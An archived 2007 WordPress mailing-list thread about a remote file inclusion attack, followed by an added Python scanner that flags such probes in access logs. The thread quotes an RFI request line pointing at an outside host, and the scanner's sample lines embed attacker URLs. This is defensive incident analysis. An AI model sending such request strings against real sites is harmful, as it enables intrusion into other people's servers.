[wp-testers] More on hack...

DD32 wordpress at dd32.id.au
Fri Dec 28 23:37:53 GMT 2007


On Sat, 29 Dec 2007 10:23:12 +1100, Simon Hollingshead <simon.hollingshead at googlemail.com> wrote:

> Now I'm no expert but by the contents of http://gw-gold.net/xpl/bot.c
> It seems like they endorse and hold DoS scripts on their server.

Looking around, I've seen a few others referring to the id.txt file and access attempts to WP. All of them are located on different servers, and the file no longer exists. My guess is that they're just using random hosts which have been exploited, rather than using servers they actually own.
It also appears to be mainly targeting specific WP plugins -- most likely older versions -- and several other common applications which have known vulnerabilities in older versions.

> There is also a GZipped Tarball file within the xpl directory but I don't
> know if I should risk opening it.  They do DoS, what's to say they don't
> also hold viruses?

There are 2 dozen compiled Linux exploits, and the C code for "Gpsd remote format string exploit" and "expand_stack SMP race local root exploit", which would be PoCs.
The naming of the compiled files is "woot", "pwned", "own", "mailbomb"... all useless names :)

>
> On Dec 28, 2007 11:07 PM, cpa31335 <tpblogeditor at gmail.com> wrote:
>
>> here's a snippet of my Hosts log file:
>>
>> 4.66.112.173 <http://64.66.112.173/> - - [17/Dec/2007:04:00:44 -0800] "GET
>> /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt
>>
>> that is what was used. I also sent this to security at wordpress.org
>>
>> nice.
>>
>> 8-(
>>
>>
>>
>> --
>> -Chuck Adkins
>> Owner and Publisher
>> The Populist News Service
>> http://www.thepopulistblog.com
>> Personal Blog:
>> http://www.thepopulistblog.com/wordpress
>> _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
> 
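
One way to find requests shaped like the one in the quoted log snippet (a remote URL embedded in the request target) across an access log, added here as an example that is not part of the original thread. The log lines, the `.example` hostnames and the `own_hosts` allowlist are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Common Log Format prefix: client ident user [time] "METHOD target ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)')
# An absolute URL appearing inside the request target.
EMBEDDED_URL_RE = re.compile(r'(?i)(?:https?|ftp)://[^\s"\'<>&]+')

# Constructed sample lines (documentation IP ranges, reserved .example names).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2007:04:00:44 -0800] "GET /?q=node/2//?q=nodehttp://attacker.example/xpl/id.txt HTTP/1.1" 404 512',
    '192.0.2.10 - - [17/Dec/2007:04:00:45 -0800] "GET /wp-content/plugins/demo/inc.php?path=http%3A%2F%2Fattacker.example%2Fxpl%2Fid.txt%3F HTTP/1.1" 404 512',
    '198.51.100.7 - - [17/Dec/2007:04:02:10 -0800] "GET /?p=12 HTTP/1.1" 200 8123',
    '198.51.100.7 - - [17/Dec/2007:04:02:11 -0800] "GET /go?to=http://blog.example/about HTTP/1.1" 302 0',
]

def find_rfi_probes(lines, own_hosts=frozenset()):
    """Return {client_ip: [(timestamp, embedded_url), ...]} for suspect requests.

    own_hosts: hostnames that may legitimately appear in parameters
    (for example redirect targets on your own site); these are skipped.
    """
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # truncated or non-CLF line
        client, ts, _method, target = m.groups()
        # Decode twice so double-encoded schemes (%2568ttp) are also seen.
        decoded = unquote(unquote(target))
        # Skip index 0 so a proxy-style absolute request URI is not counted.
        for url in EMBEDDED_URL_RE.findall(decoded[1:]):
            try:
                host = (urlsplit(url).hostname or "").lower()
            except ValueError:
                host = ""  # malformed authority: still report it
            if host in own_hosts:
                continue
            hits[client].append((ts, url))
    return dict(hits)

if __name__ == "__main__":
    for ip, found in find_rfi_probes(SAMPLE_LOG, {"blog.example"}).items():
        for ts, url in found:
            print(f"{ip} [{ts}] -> {url}")
```

Grouping the hits by embedded URL rather than by client shows the same payload being requested from many source addresses, which fits the observation above that the senders are themselves exploited hosts.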




